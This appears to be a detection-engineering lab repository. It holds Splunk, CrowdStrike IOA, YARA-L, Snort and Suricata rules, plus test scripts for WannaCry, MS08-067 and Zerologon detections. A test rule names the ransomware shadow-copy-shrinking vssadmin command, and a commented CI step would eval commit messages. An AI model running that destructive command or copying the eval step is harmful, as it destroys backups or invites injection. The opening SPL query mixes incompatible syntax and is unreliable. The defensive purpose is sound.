20 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
21 | FROM datamodel=Endpoint.Processes
22 | WHERE ProcesName IN ("sshd", "telnetd", "httpd")
23 | BY ClientIpAddress
24 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
25 | FROM datamodel=Network.Traffic
26 | WHERE ProtoPort="80/tcp" OR ProtoPort="23/tcp" OR ProtoPort="22/tcp"
27 | BY ClientIpAddress
28 | | join kind=inner ClientIpAddress
29 | | `security_analytics` lookup iplocation ClientIpAddress
30 | | `security_analytics` geoip lookup
31 | | `security_analytics` geoip metadata="Botnet C2 analysis"
32 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-rssparse-generate-spl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, feedparser
3 | import fastapi_poe as fp
4 | from datetime import datetime, timedelta
5 |
6 | api_key = os.getenv('POE_API')
7 |
async def get_responses(api_key, url):
    """Prompt a Poe bot to analyze the contents at `url` and return its full reply.

    Builds a detection-engineering prompt plus an attachment message pointing
    at `url`, streams the bot's partial responses, and concatenates them.
    Async iteration is required because the bot emits multi-line output in
    chunks that must all arrive before the response is usable.
    """
    response = ""
    # Using f-strings allows positioning token replacements (only {url} is
    # substituted; the remaining prompt lines are static text)
    message = fp.ProtocolMessage(role="user", content=(
        f"### Context\n"
        f"You are a detection engineer bot that analyzes cybersecurty inputs that creates code, parsed outputs, and signatures for tools like SIEM, EDR, NIDS, CNAPP.\n"
        f"You are also a bot that ensures that the requirements section is never skipped or missed.\n"
        f"## Requirements\n"
        f"- Do not include unnecessary statements in your response, only code.\n"
        f"- Do not include any explanations in your responses.\n"
        f"- Never fabricate or provide untrue details that impact functionality.\n"
        f"- Do not make mistakes. Always validate your response to work.\n"
        f"- Seek example logs and official documentations on the web to use in your validation.\n"
        f"## Request\n"
        f"Provide a response with the following requirements:\n"
        f"- The attached contents are from {url}. Parse accordingly.\n"
        f"- Analyze the parsed contents to find indicators of compromise patterns. \n"
        f"- Create a list of file hashes and process syntaxes to look for. \n"
        f"- From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant"
    ))

    #wrap create a message with an attachment so the bot can fetch/parse the URL contents
    #https://developer.poe.com/server-bots/enabling-file-upload-for-your-bot
    attachment_url = url #our input
    attachment_name = "attachment.txt" #any name is fine because its referenced in prompt
    attachment_content_type = "text/plain" #use mime format
    attachment_message = fp.ProtocolMessage(
        role="user",
        content=f"Attachment: {attachment_url}",
        attachments=[fp.Attachment(url=attachment_url, name=attachment_name, content_type=attachment_content_type)]
    )
    # Stream partial responses and accumulate the non-empty text chunks
    async for partial in fp.get_bot_response(messages=[message, attachment_message],
                                             bot_name="Claude-Instant",
                                             #bot_name="LinkAwareBot",
                                             api_key=api_key,
                                             temperature=0.25):
        if isinstance(partial, fp.PartialResponse) and partial.text:
            response += partial.text
    return response
47 |
def get_urls(rssfeed):
    """Return links from `rssfeed` published within the last 24 hours.

    Args:
        rssfeed: RSS feed URL, e.g. https://allinfosecnews.com/feed/

    Returns:
        list[str]: entry links newer than 24h, for the main driver to iterate on.
    """
    from datetime import timezone  # local import keeps this fix self-contained

    feed = feedparser.parse(rssfeed)
    links = []

    # Timezone-aware "now" so the comparison below is correct regardless of
    # the machine's local UTC offset
    now = datetime.now(timezone.utc)
    time_range = timedelta(days=1)

    for entry in feed.entries:
        # Parse the RFC 822 timestamp including its UTC offset via %z.
        # (The previous approach stripped the offset and compared against
        # naive local time, skewing the 24h window by the local UTC offset.)
        entry_date = datetime.strptime(entry.published, "%a, %d %b %Y %H:%M:%S %z")

        if now - entry_date <= time_range:
            links.append(entry.link)
    return links #returns a list to iterate on in main driver
64 |
#main driver
if __name__ == "__main__":
    #get fresh -24h urls returns as list type
    fresh_urls = get_urls('https://allinfosecnews.com/feed/')

    #write std out to file too messy in console; the context manager closes
    #the handle even if a bot call raises (original leaked it on exceptions)
    with open("ai-recommended-spl.txt", "w") as file_handle:
        for url in fresh_urls:
            bot_response = asyncio.run(get_responses(api_key, url))
            print("Writing responses for: " + url)
            file_handle.write(bot_response + "\n")
80 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/requirements.txt:
--------------------------------------------------------------------------------
1 | annotated-types==0.6.0
2 | anyio==4.2.0
3 | certifi==2023.11.17
4 | click==8.1.7
5 | fastapi==0.109.1
6 | fastapi_poe==0.0.28
7 | feedparser==6.0.11
8 | h11==0.14.0
9 | httpcore==1.0.2
10 | httpx==0.26.0
11 | httpx-sse==0.4.0
12 | idna==3.6
13 | pydantic==2.5.3
14 | pydantic_core==2.14.6
15 | sgmllib3k==1.0.0
16 | sniffio==1.3.0
17 | sse-starlette==1.8.2
18 | starlette==0.35.1
19 | typing_extensions==4.9.0
20 | uvicorn==0.25.0
21 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/custom-ioa-cs.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse, json
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 |
def uploadioa(ioc_body):
    """Create a custom IOA rule in CrowdStrike Falcon from a prepared JSON body.

    Passes the payload straight through to the Uber-class `create_rule`
    command and returns the raw API response dict for the caller to render.
    """
    return falcon.command("create_rule",
                          retrodetects=False,
                          ignore_warnings=True,
                          body=ioc_body)
17 |
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        prog='custom-ioa-cs',
        description='Takes JSON formatted payload for a custom IOA',
        epilog='Usage: python3 custom-ioa-cs.py -id "" -secret ""'
    )
    parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
    parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
    args = parser.parse_args()

    #assign secrets from arguments passed on the CLI
    CLIENT_ID = args.id
    CLIENT_SECRET = args.secret

    #client setup done outside of the upload function so repeated posts
    #aren't used against call quotas each time
    falcon = APIHarnessV2(client_id=CLIENT_ID,
                          client_secret=CLIENT_SECRET
                          )

    #construct body read from external file like a real CI; context manager
    #closes the handle (original leaked it) and json.load reads the stream
    with open('test-rule-import.json', 'r') as file_handle:
        BODY = json.load(file_handle)
    #print(type(BODY))
    #print(BODY)

    #call function with parameters and render the API response as JSON
    response = uploadioa(BODY)
    json_response = json.dumps(response)
    print(json_response)

    exit()
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/get-ioa-cs.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# Fetch CrowdStrike Falcon custom IOA rule(s) by ID and print the API response as JSON.
import os, json
from falconpy import APIHarnessV2

# Read API credentials from the environment
# (export CS_CLIENT_ID / CS_CLIENT_SECRET from the shell first)
CLIENT_ID = os.getenv('CS_CLIENT_ID')
CLIENT_SECRET = os.getenv('CS_CLIENT_SECRET')

# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
                    client_secret=CLIENT_SECRET
                    )

# Rule IDs to retrieve; "1" targets the first custom IOA rule
BODY = {
    "ids": ["1"]
}

response = falcon.command("get_rules_get", body=BODY)
#print(type(response))
# Serialize the response dict so the output is machine-parsable
json_response = json.dumps(response)
print(json_response)
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/github-action-deploy-customioa.yml:
--------------------------------------------------------------------------------
1 | #DE part of EDR CI init with GHEC use github.com/UKGEPIC/detection-engineering-edr
2 | name: Connect to an AWS role from a GitHub repository
3 | on:
4 | push:
5 | branches: [ main ]
6 | pull_request:
7 | branches: [ main ]
8 |
9 | env:
10 | ## TODO Figure out secrets management, since GitHub Secrets and env variables are not approved yet
11 | #ensure this matches the final custom-ioa-cs.py function calls for the API client
12 | CLIENT_ID : "foo"
13 | CLIENT_SECRET : "bar"
14 |
15 | # Permission can be added at job level or workflow level
16 | permissions:
17 | #id-token: write # This is required for requesting the JWT
18 | contents: read # This is required for actions/checkout
19 | jobs:
20 | DeployFalconCustomIOAs:
21 | runs-on: ubuntu-latest
22 | steps:
23 | - name: Git clone the repository
24 | uses: actions/checkout@v3 #ensure repo is checked out so working directory is same
25 | - name: Setup Python Packages
26 | uses: actions/setup-python@v5
27 | with:
28 | python-version: '3.10'
29 | cache: 'pip'
30 | - run: pip install -r ./requirements.txt
31 | - name: Validate Syntax
32 | #TODO linter-custom-ioa.py needs refactor to include arguments to specify the usecase files
33 | run: |
34 | python linter-custom-ioa.py
35 | - name: Deploy CS Falcon Custom IOA
36 | #TODO custom-ioa-cs.py needs refactor to use env variables instead of passing parameters for API client
37 | run: |
38 | python custom-ioa-cs.py ./path/to/usecaseimport.json
39 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/helloWorld-sysargv-example.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import sys
# Python puts the script name itself in sys.argv[0]; the first real argument is sys.argv[1].
# You can set a shell env variable, e.g. export TEST='bar',
# then run: python3 helloWorld-sysargv-example.py $TEST
# No immediate need to refactor scripts that use arguments - just pass the shell variable :)
print('hello foo', sys.argv[1])

# But of course if you wanted to read shell variables directly,
# just comment out or remove the argument/parser requirements and replace with similar:
# export TEST='myLittleSecret'
import os
api_secret = os.getenv('TEST') #variable name as seen by the shell, without the $ prefix
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/linter-custom-ioa.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Lint a custom IOA payload file against the Falcon create-rule body schema."""
import jsonschema, json

# Raw OpenAPI spec:
# https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json

# 2023-dec-28 us-2 falcon create-rule body, expressed as an actual JSON
# Schema. NOTE: the previous version was an *example document*, not a schema;
# jsonschema ignores unknown keywords, so validation always passed.
custom_ioa_schema = {
    "type": "object",
    "required": ["comment", "description", "disposition_id", "field_values",
                 "name", "pattern_severity", "rulegroup_id", "ruletype_id"],
    "properties": {
        "comment": {"type": "string"},
        "description": {"type": "string"},
        "disposition_id": {"type": "integer"},
        "field_values": {
            "type": "array",
            "items": {
                "type": "object",
                "required": ["final_value", "label", "name",
                             "type", "value", "values"],
                "properties": {
                    "final_value": {"type": "string"},
                    "label": {"type": "string"},
                    "name": {"type": "string"},
                    "type": {"type": "string"},
                    "value": {"type": "string"},
                    "values": {
                        "type": "array",
                        "items": {
                            "type": "object",
                            "required": ["label", "value"],
                            "properties": {
                                "label": {"type": "string"},
                                "value": {"type": "string"}
                            }
                        }
                    }
                }
            }
        },
        "name": {"type": "string"},
        "pattern_severity": {"type": "string"},
        "rulegroup_id": {"type": "string"},
        "ruletype_id": {"type": "string"}
    }
}

try:
    # Imported sample use case; context manager guarantees the handle closes.
    with open('test-rule-import.json', 'r') as file_handle:
        use_case_payload = json.load(file_handle)

    # validate() returns None on success and raises ValidationError on failure.
    jsonschema.validate(instance=use_case_payload, schema=custom_ioa_schema)
    print('Custom use case payload VALIDATED')
except jsonschema.ValidationError as err:
    print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023: '
          + err.message +
          ' See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
    exit(1)
except (OSError, json.JSONDecodeError) as err:
    # Surface the real problem; the original bare `except: exit(1)` silently
    # hid missing files and malformed JSON alike.
    print(f'ERROR: could not read or parse test-rule-import.json: {err}')
    exit(1)
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/requirements.txt:
--------------------------------------------------------------------------------
1 | attrs==23.1.0
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.5
5 | idna==3.6
6 | jsonschema==4.20.0
7 | jsonschema-specifications==2023.12.1
8 | referencing==0.32.0
9 | requests==2.31.0
10 | rpds-py==0.15.2
11 | urllib3==2.1.0
12 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.1/test-rule-import.json:
--------------------------------------------------------------------------------
1 | {
2 | "comment": "test falconpy custom ioa",
3 | "description": "example custom ioa detection use case",
4 | "disposition_id": 10,
5 | "field_values": [
6 | {
7 | "name": "GrandparentImageFilename",
8 | "value": ".*",
9 | "label": "Grandparent Image Filename",
10 | "type": "excludable",
11 | "values": [
12 | {
13 | "label": "include",
14 | "value": ".*"
15 | }
16 | ],
17 | "final_value": ".*"
18 | },
19 | {
20 | "name": "GrandparentCommandLine",
21 | "value": ".*",
22 | "label": "Grandparent Command Line",
23 | "type": "excludable",
24 | "values": [
25 | {
26 | "label": "include",
27 | "value": ".*"
28 | }
29 | ],
30 | "final_value": ".*"
31 | },
32 | {
33 | "name": "ParentImageFilename",
34 | "value": ".*",
35 | "label": "Parent Image Filename",
36 | "type": "excludable",
37 | "values": [
38 | {
39 | "label": "include",
40 | "value": ".*"
41 | }
42 | ],
43 | "final_value": ".*"
44 | },
45 | {
46 | "name": "ParentCommandLine",
47 | "value": ".*",
48 | "label": "Parent Command Line",
49 | "type": "excludable",
50 | "values": [
51 | {
52 | "label": "include",
53 | "value": ".*"
54 | }
55 | ],
56 | "final_value": ".*"
57 | },
58 | {
59 | "name": "ImageFilename",
60 | "value": ".*",
61 | "label": "Image Filename",
62 | "type": "excludable",
63 | "values": [
64 | {
65 | "label": "include",
66 | "value": ".*"
67 | }
68 | ],
69 | "final_value": ".*"
70 | },
71 | {
72 | "name": "CommandLine",
73 | "value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB",
74 | "label": "Command Line",
75 | "type": "excludable",
76 | "values": [
77 | {
78 | "label": "include",
79 | "value": "(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
80 | }
81 | ],
82 | "final_value": "(?i)(vssadmin|vssadmin\\.exe)\\S{1,10}resize shadowstorage /for=C: /On=C: /Maxsize=1MB"
83 | }
84 | ],
85 | "name": "test-rule-ioa-runner",
86 | "pattern_severity": "informational",
87 | "rulegroup_id": "",
88 | "ruletype_id": "1"
89 | }
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/WannaCry Malware Profile _ Mandiant.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-05/lab-5.2/WannaCry Malware Profile _ Mandiant.pdf
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-rule-payload-check.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Unit-check a YARA-L rule: the expected payload must appear both in the
rule body and in the content fetched from the rule's meta reference URL."""
import os, re, sys

# Test criteria needed.
payload_match = 'fsodp9ifjaposdfjhgosurijfaewrwergwea'
file_path = 'wannacry_killswitch_domain.yaral'

# Set a browser-like user agent in case the reference site sits behind WAF rules.
ua_header = {
    'User-Agent':
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
}


def extract_reference_url(yara_rule):
    """Return the first meta `reference = "<url>"` value in a YARA rule
    string, or None when no reference field is present."""
    # Raw string avoids the invalid escape sequences ('\=') of the original.
    url_match = re.search(r'reference\s=\s"(\S{10,100})"', yara_rule)
    return url_match.group(1) if url_match else None


def main():
    """Run both payload checks and exit non-zero on any failure.

    The original wrapped plain `if` statements in try/except ValueError;
    those ifs never raise, so a failed check fell through and the script
    exited 0. Every failure now exits 1 explicitly.
    """
    import requests  # network-only dependency; local import keeps helpers importable

    # Context manager guarantees the handle closes on every exit path.
    with open(file_path, 'r') as file_handle:
        yara_rule = file_handle.read()  # reads as one serialized string

    url = extract_reference_url(yara_rule)
    if not url:
        print('error: reference field missing or non-url')
        sys.exit(1)

    response = requests.get(url, headers=ua_header)
    content = str(response.content)

    if payload_match not in content:
        print('error: did not find expected payload in reference content')
        sys.exit(1)
    print('Check 1/2: Found payload IOC/IOA in Content Ref:')

    if payload_match not in yara_rule:
        print('error: did not find expected payload in rule')
        sys.exit(1)
    print('Check 2/2: Found expected payload in yara rule')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-rule-testspec-ci.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Testspec-driven YARA-L payload check: reads tests/testspec.txt for the
payload and rule file, then verifies the payload appears in both the rule
and the content fetched from the rule's meta reference URL."""
import os, re, sys
from pathlib import Path


def parse_testspec(test_spec):
    """Parse the payload and rule-file path out of a testspec string.

    Expected format (one field per line):
        payload: <ioc string>
        file_path: <path ending in .yaral>

    Returns:
        (payload, file_path) tuple.

    Raises:
        ValueError: when either field is missing.
    """
    payload_match = re.search(r'payload: (.{3,128})', test_spec)
    file_path_match = re.search(r'file_path: (.{2,100}\.yaral)', test_spec)
    if not payload_match or not file_path_match:
        raise ValueError('testspec missing payload or file_path field')
    return payload_match.group(1), file_path_match.group(1)


def extract_reference_url(yara_rule):
    """Return the first meta `reference = "<url>"` value, or None if absent."""
    url_match = re.search(r'reference\s=\s"(\S{10,100})"', yara_rule)
    return url_match.group(1) if url_match else None


def main():
    """Run both payload checks and exit non-zero on any failure.

    The original wrapped plain `if` statements in try/except ValueError;
    those ifs never raise, so failed checks silently exited 0. Also fixes
    the broken shebang (#!/usr/bin/env/python3) of the original.
    """
    import requests  # network-only dependency; local import keeps helpers importable

    # Resolve the testspec relative to the current working directory.
    absolute_path = Path.cwd() / Path('tests/testspec.txt')
    with open(absolute_path, 'r') as file_handle:
        payload, file_path = parse_testspec(file_handle.read())

    # Browser-like user agent in case the reference site sits behind WAF rules.
    ua_header = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
    }

    with open(file_path, 'r') as file_handle:
        yara_rule = file_handle.read()  # whole rule as one serialized string

    url = extract_reference_url(yara_rule)
    if not url:
        print('error: reference field missing or non-url')
        sys.exit(1)

    response = requests.get(url, headers=ua_header)
    content = str(response.content)

    if payload not in content:
        print('error: did not find expected payload in reference content')
        sys.exit(1)
    print('Check 1/2: Found payload IOC/IOA in Content Ref:')

    if payload not in yara_rule:
        print('error: did not find expected payload in rule')
        sys.exit(1)
    print('Check 2/2: Found expected payload in yara rule')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/chron-yara-unittest.yml:
--------------------------------------------------------------------------------
1 | # simple unit payload based testing from meta in a CI
2 | # best to chain this workflow as reusable to a deployment workflow
3 | # reference within from your deployment action:
4 | # - name: run reusable unittest workflow
5 | # uses: ./.github/workflows/unittest-workflow-file.yml
6 |
7 |
8 | name: Chronicle YARA-L Rule Payload Unit Payload Tests
9 |
10 | # Controls when the workflow will run
11 | on:
12 | push:
13 | branches: [ "main" ]
14 | paths:
15 | - tests/*
16 | #- chron-rules/*
17 | pull_request:
18 | branches: [ "main" ]
19 |
20 | # Allows you to run this workflow manually from the Actions tab
21 | workflow_dispatch:
22 |
23 | #dont need env variables for simple unit tests.
24 | #though you could specify in your commit message which file test name to use and rules and use eval
25 | #env:
26 | #test_payload: ${{ github.event.head_commit.message }}
27 |
28 | permissions:
29 | contents: read # This is required for actions/checkout
30 |
31 | jobs:
32 | DetectionTestTrigger:
33 | # The type of runner that the job will run on
34 | runs-on: ubuntu-latest #based on logical combination of labels
35 | steps:
36 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
37 | - uses: actions/checkout@v4
38 |
39 | #apparently github python is bare with no requests lib
40 | - name: Setup Python Packages
41 | uses: actions/setup-python@v5
42 | with:
43 | python-version: '3.10'
44 | cache: 'pip'
45 | - run: pip install -r ./requirements.txt
46 |
47 | # if you wanted to pass arguments from the message refactoring the script you can
48 | #- name: Execute Payload from Commit Message
49 | # continue-on-error: true #doesn't guarantee a trigger, just that bash won't exit on a non-zero condition
50 | # run: eval $test_payload
51 |
52 | - name: Run Tests
53 | run: |
54 | python ./tests/chron-yara-rule-testspec-ci.py #script relies on relative ./tests/testspec.txt file for runtime
55 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/tests/chron-yara-rule-testspec-ci.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Testspec-driven YARA-L payload check: reads tests/testspec.txt for the
payload and rule file, then verifies the payload appears in both the rule
and the content fetched from the rule's meta reference URL."""
import os, re, sys
from pathlib import Path


def parse_testspec(test_spec):
    """Parse the payload and rule-file path out of a testspec string.

    Expected format (one field per line):
        payload: <ioc string>
        file_path: <path ending in .yaral>

    Returns:
        (payload, file_path) tuple.

    Raises:
        ValueError: when either field is missing.
    """
    payload_match = re.search(r'payload: (.{3,128})', test_spec)
    file_path_match = re.search(r'file_path: (.{2,100}\.yaral)', test_spec)
    if not payload_match or not file_path_match:
        raise ValueError('testspec missing payload or file_path field')
    return payload_match.group(1), file_path_match.group(1)


def extract_reference_url(yara_rule):
    """Return the first meta `reference = "<url>"` value, or None if absent."""
    url_match = re.search(r'reference\s=\s"(\S{10,100})"', yara_rule)
    return url_match.group(1) if url_match else None


def main():
    """Run both payload checks and exit non-zero on any failure.

    The original wrapped plain `if` statements in try/except ValueError;
    those ifs never raise, so failed checks silently exited 0. Also fixes
    the broken shebang (#!/usr/bin/env/python3) of the original.
    """
    import requests  # network-only dependency; local import keeps helpers importable

    # Resolve the testspec relative to the current working directory.
    absolute_path = Path.cwd() / Path('tests/testspec.txt')
    with open(absolute_path, 'r') as file_handle:
        payload, file_path = parse_testspec(file_handle.read())

    # Browser-like user agent in case the reference site sits behind WAF rules.
    ua_header = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
    }

    with open(file_path, 'r') as file_handle:
        yara_rule = file_handle.read()  # whole rule as one serialized string

    url = extract_reference_url(yara_rule)
    if not url:
        print('error: reference field missing or non-url')
        sys.exit(1)

    response = requests.get(url, headers=ua_header)
    content = str(response.content)

    if payload not in content:
        print('error: did not find expected payload in reference content')
        sys.exit(1)
    print('Check 1/2: Found payload IOC/IOA in Content Ref:')

    if payload not in yara_rule:
        print('error: did not find expected payload in rule')
        sys.exit(1)
    print('Check 2/2: Found expected payload in yara rule')


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/tests/testspec.txt:
--------------------------------------------------------------------------------
1 | payload: fsodp9ifjaposdfjhgosurijfaewrwergwea
2 | file_path: wannacry_killswitch_domain.yaral
--------------------------------------------------------------------------------
/chapter-05/lab-5.2/wannacry_killswitch_domain.yaral:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2021 Google LLC
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * https://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 |
17 | rule malware_wannacry_killswitch_domain
18 | {
19 | meta:
20 | author = "Google Cloud Security"
21 | description = "WannaCry kill-switch domain"
22 | reference = "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
23 | yara_version = "YL2.0"
24 | rule_version = "1.0"
25 |
26 | events:
27 | $e1.metadata.event_type = "NETWORK_DNS"
28 | re.regex($e1.network.dns.questions.name, `(iffer|iuqer|iuqss)fsodp9ifjaposdfjhgosurijfaewrwergwea\.(com|test)`)
29 |
30 | condition:
31 | $e1
32 | }
33 |
--------------------------------------------------------------------------------
/chapter-05/lab-5.3/rules/ms08-067-snort.rule:
--------------------------------------------------------------------------------
1 | alert smb any any -> $HOME_NET any (msg:"ET EXPLOIT Possible ECLIPSEDWING MS08-067"; flow:to_server,established; content:"|ff|SMB|2f 00 00 00 00|"; offset:4; depth:9; content:"|00 00 00 00 ff ff ff ff 08 00|"; distance:30; within:10; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; fast_pattern; content:"|2e 00 00 00 00 00 00 00 2e 00 00 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; within:12; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; content:"|2f 00 41 00 2f 00 2e 00 2e 00 2f 00|"; distance:0; isdataat:800,relative; classtype:trojan-activity; sid:2024215; rev:1; metadata:attack_target SMB_Server, created_at 2017_04_17, deployment Internal, former_category EXPLOIT, signature_severity Critical, updated_at 2019_07_26;)
--------------------------------------------------------------------------------
/chapter-05/lab-5.3/snort2panos-test.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Check whether the content patterns in *.rule Snort files fit PAN-OS 10.x
custom-threat-signature pattern length limits."""
import re, os, argparse, sys

# References:
# https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/create-a-custom-threat-signature/create-a-custom-threat-signature-from-a-snort-signature
# https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/custom-signature-pattern-requirements


def count_pattern_chars(section):
    """Return the character count of one Snort content pattern, excluding the
    '|' delimiters that wrap hex byte sequences."""
    return len(section) - section.count('|')


def check_rule_patterns(snort_rule, max_chars=127):
    """Check every content:"..." section of one Snort rule line against the
    PAN-OS pattern length limit. Returns True when all sections comply."""
    compliant = True
    for section in re.findall(r'content:"(.*?)";', snort_rule):
        num_chars = count_pattern_chars(section)
        print(f"Content Section: {section}")
        print(f"Total Characters: {num_chars}")
        print()
        if num_chars <= max_chars:
            print('Payload pattern is likely PAN-OS compliant')
        else:
            # The original try/except ValueError never fired here, so
            # over-long patterns passed silently; flag them explicitly.
            print('Payload pattern length too long for PAN-OS')
            compliant = False
    return compliant


def main():
    # Runtime args.
    parser = argparse.ArgumentParser()
    parser.add_argument('-dir', type=str, help='Provide the relative directory path of the snort rules to validate.')
    args = parser.parse_args()

    if not args.dir:
        # Original only printed here and then crashed on os.fsencode(None).
        print('Please provide directory for the *.rule files')
        sys.exit(1)

    # Iterate every *.rule file in the given directory.
    for file in os.listdir(os.fsencode(args.dir)):
        file_name = os.fsdecode(file)
        if file_name.endswith(".rule"):
            full_path = str(args.dir) + '/' + str(file_name)
            # Context manager closes each file even when a check fails.
            with open(full_path, 'r') as file_bin:
                for snort_rule in file_bin:
                    if not check_rule_patterns(snort_rule):
                        sys.exit(1)


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/bash-testing/test-suricata-unittest-rules.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Unit-test one Suricata rule file against a known-bad pcap and fail the
# build when the expected alert is not produced.

# Test variables.
RULE_NAME='ET EXPLOIT Possible Zerologon NetrServerAuthenticate'
RULE_FILE='./rules/test-exploit-zerologon.rules'
TEST_PCAP='./tests/cve-2020-1472-exploit.pcap'

# Clean up logs from any previous run; -f suppresses errors when none exist.
rm -rf ./logs/*.log
rm -f ./*.log

# Run suricata against the pcap with only the rule file under test.
# Quoting guards against paths containing spaces.
suricata -c ./suricata-config.yml -r "$TEST_PCAP" -S "$RULE_FILE"

# Count alert lines for the rule under test.
RESULTS=$(grep -ci "$RULE_NAME" ./fast.log)

# Clean up inside each branch before exiting: the original trailing cleanup
# after the if/fi was unreachable because both branches exit first.
if [[ $RESULTS -ge 1 ]]; then
    echo "TEST PASSED: $RULE_NAME matches $TEST_PCAP"
    rm -rf ./logs/*.log; rm -f ./*.log
    exit 0
else
    echo "TEST FAILED: $RULE_NAME does NOT match $TEST_PCAP"
    rm -rf ./logs/*.log; rm -f ./*.log
    exit 1
fi
--------------------------------------------------------------------------------
/chapter-05/lab-5.4/bash-testing/test2-suricata-unittest-rules.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Batch-run Suricata rule unit tests: every (rule file, rule name) pair in
# RULES is tested against every pcap in PCAPS.

# RULES holds alternating entries: rule file path, then the rule name to grep for.
RULES=(
    #'./rules/rule1.rules' 'Rule 1 Name'
    #'./rules/rule2.rules' 'Rule 2 Name'
    './rules/test-exploit-zerologon.rules' 'ET EXPLOIT Possible Zerologon NetrServerAuthenticate'
)

PCAPS=(
    #'./tests/pcap1.pcap'
    #'./tests/pcap2.pcap'
    './tests/cve-2020-1472-exploit.pcap'
)

FAILED=0

# Step by 2 so each iteration consumes one (file, name) pair. The original
# `for i in "${!RULES[@]}"` visited every index, so rule names were also
# treated as rule files. (The pcap path was also missing its leading '.'.)
for ((i = 0; i < ${#RULES[@]}; i += 2)); do
    RULE_FILE=${RULES[i]}
    RULE_NAME=${RULES[i + 1]}
    for PCAP in "${PCAPS[@]}"; do

        # Actual test execution; quote paths in case they contain spaces.
        suricata -c suricata.yaml -r "$PCAP" -S "$RULE_FILE" > /dev/null

        # Validate the test by counting alert lines for the rule name.
        RESULTS=$(grep -ci "$RULE_NAME" fast.log)
        if [[ $RESULTS -ge 1 ]]; then
            echo "PASSED: $RULE_NAME matched $PCAP"
        else
            echo "FAILED: $RULE_NAME did not match $PCAP"
            FAILED=1
        fi

    done
done

# Propagate any failure to CI (the original always exited 0).
exit $FAILED
--------------------------------------------------------------------------------
